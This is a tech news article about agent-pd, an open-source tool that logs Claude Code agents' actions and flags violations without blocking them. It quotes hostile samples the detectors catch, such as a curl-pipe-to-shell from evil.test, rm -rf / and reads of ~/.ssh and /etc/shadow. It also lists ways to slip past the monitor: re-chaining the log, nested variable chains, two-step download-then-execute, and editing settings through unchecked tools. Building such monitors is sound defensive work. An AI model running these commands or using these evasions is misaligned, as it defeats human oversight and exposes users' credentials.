agent-pd Bets That Watching Your AI Agents Beats Trying to Stop Them
#Security

agent-pd Bets That Watching Your AI Agents Beats Trying to Stop Them

Trends Reporter
7 min read

A new open-source tool logs every move Claude Code agents make and replays it through six deterministic detectors. It deliberately never blocks anything, which is either refreshing honesty or a sign that agent security is still searching for a foothold.

A pattern has been quietly forming in the tooling that surrounds AI coding agents. As Claude Code, Cursor, and similar tools gained the ability to run shell commands, read arbitrary files, and spawn their own subagents, the first instinct from the security-minded was to build walls. Sandboxes. Permission gates. Allowlists that say no. The newer instinct, visible in projects like agent-pd, is almost the opposite: stop trying to prevent, start trying to record.

agent-pd bills itself as "a police department for your Claude Code agents," and the metaphor is doing real work. It does not arrest anyone. A logging-only hook captures every tool and permission event from the main agent and any subagents, writes them to a per-session audit log, and then a separate CLI replays that log through detectors that flag rule violations with quoted evidence. The author's framing is blunt: it is a flight recorder and a police scanner, not a firewall. If you actually need to stop an action, that responsibility stays with Claude Code's own permission prompts or an OS-level sandbox.

Featured image

The trend: observability is eating agent security

The broader signal here is that the developer community is converging on observability as the practical answer to agent risk, at least for now. The reasoning runs something like this. Blocking is hard because agents are useful precisely when they have broad capabilities, and every wall you build either gets in the way or gets routed around. Watching is cheap, deterministic, and honest about its own limits. You can always read a transcript after the fact. The problem agent-pd identifies is that reading transcripts is miserable, and worse, that denied calls never even reach the transcript because Claude Code kills them first. So the events most worth auditing are the ones least visible.

That last point is the genuinely interesting technical observation. A denied curl http://evil.test | sh only exists in the hook's audit log. It is the reason the project installs a PostToolUse / PermissionDenied hook rather than just parsing the conversation log after the fact.

capture vs. read

The evidence: what it actually catches

The architecture splits cleanly into a dumb recorder and a smart reader. The hook is registered globally in ~/.claude/settings.json, fires on every tool call, appends one hash-chained line to a per-session file, and always exits zero. It never blocks, never loses an event, and records concurrent sessions in parallel. All the intelligence lives in the reader, where pd report and pd watch correlate the log into per-agent records and run six detectors at zero token cost, because they are plain Python rather than LLM calls.

The six detectors are worth naming, because their boundaries reveal the design philosophy. permission_bypass catches denied calls plus a two-tier Bash scan, where catastrophic patterns like rm -rf /, fork bombs, and curl|sh stay critical under any allow-rule, while downgradable escalations like sudo or chmod 777 can be softened by a precise rule. out_of_scope flags file or shell paths outside the project, treating ~/.ssh, ~/.aws, and /etc/shadow as always-critical. self_permission catches an agent writing to its own control files, including via indirect Bash tricks like tee, sed, or base64. tool_not_allowed fires when a subagent uses a tool outside its declared allowlist. redundant notes exact-duplicate calls. And off_task is the heuristic outlier, comparing search terms against an agent's brief by word overlap.

pd watch --all: merged live feed across three sessions — § intro line per session, agent banners with briefs, two genuine flags (a credentials read and a denied curl|sh) and one off_task review

The demo output is concrete enough to evaluate. On a seeded synthetic session, the report flags a sudo escalation, a denied curl | sh, a read of ~/.ssh/id_rsa, a write to the agent's own settings.json, and a /tmp access outside the project, while a subagent gets flagged for using Bash when its allowlist only declared Glob, Grep, and Read. Crucially, the legitimate read of an in-project app.py produces no offense. That ratio, five genuine problems caught and one ordinary action correctly ignored, is the thing any detection tool lives or dies on.

The project also leans hard into reproducibility, which earns it credibility points. Every screenshot in the README is described as a real terminal capture of the real engine replaying seeded sessions, and examples/demo.sh and examples/demo-sessions.sh let you regenerate them. The test suite runs 474 tests with no network and no API key.

The counter-perspective: tamper-evident is not tamper-proof

Here is where a tech observer should resist the easy enthusiasm, and to its credit, so does the project itself. The audit log is hash-chained, so pd verify can detect a deleted event or a flipped byte. But the README states plainly that this is tamper-evident, not tamper-proof: a same-user agent with Bash access can simply re-chain the entire file. The optional off-host append-only sink closes the retroactive-deletion half of that gap, since an event shipped off-machine cannot be unwritten locally, but append-only enforcement is the operator's responsibility, and the sink does nothing to stop a same-privilege agent from forging new entries or disabling the hook outright.

The limitations section is unusually candid for a security-adjacent project, and that honesty is itself part of the trend worth noting. Static detection is evadable by a determined same-privilege adversary. Multi-level variable chains like A=/etc/shadow; B=$A; cat $B slip past single-level expansion. Two-step download-then-execute patterns evade the curl|sh matcher. Non-Bash filesystem MCP tools can write to .claude/settings.json undetected because only Write, Edit, NotebookEdit, and Bash are inspected. The off_task heuristic cannot even run on the main agent, because it has no declared brief to compare against.

agent-pd system context

This raises a fair question about the entire category. If a motivated adversarial agent can route around static detection, what is the actual threat model? The honest answer, and the one the project implicitly adopts, is that the realistic risk from AI agents today is not a sophisticated adversary deliberately obfuscating its tracks. It is a capable, well-intentioned agent that wanders out of scope, reads a credentials file it had no business touching, or rabbit-holes into work nobody asked for. Against that threat, deterministic logging and quoted evidence are genuinely useful, and the bar they raise is the bar that matters. Against a truly hostile agent with shell access, nothing short of an OS sandbox helps, and agent-pd never claims otherwise.

Where this sits

The opt-in LLM judge is the project's hedge against its own weakest detector. Because off_task is deliberately noisy and hard-labeled low confidence, pd judge exists to read each agent's brief plus its flagged searches and confirm or drop the flags, batched into one API call per agent and dry-run by default so you see the cost before spending anything. It can run through your existing Claude subscription via the headless CLI or through the metered Anthropic API. That structure, cheap deterministic checks for the trustworthy signals and a cost-capped LLM pass only for the fuzzy one, is a sensible pattern that other agent-tooling projects will likely copy.

What agent-pd represents is a maturing of how developers think about agent autonomy. The early conversation was binary: let the agent run, or lock it down. The position taking shape now is that you can grant broad capability and still demand an accountable record, the same trade society makes with body cameras and audit trails everywhere else. Whether logging-without-blocking is enough depends entirely on who you think your agents are. For the developer who trusts their tools but wants receipts, it is a reasonable answer. For anyone expecting it to stop a heist, the README told you upfront that it won't. The tool is Apache 2.0 licensed and installs with a single pip install agent-pd followed by pd install-hook, which lowers the cost of finding out which camp you fall into.

Comments

Loading comments...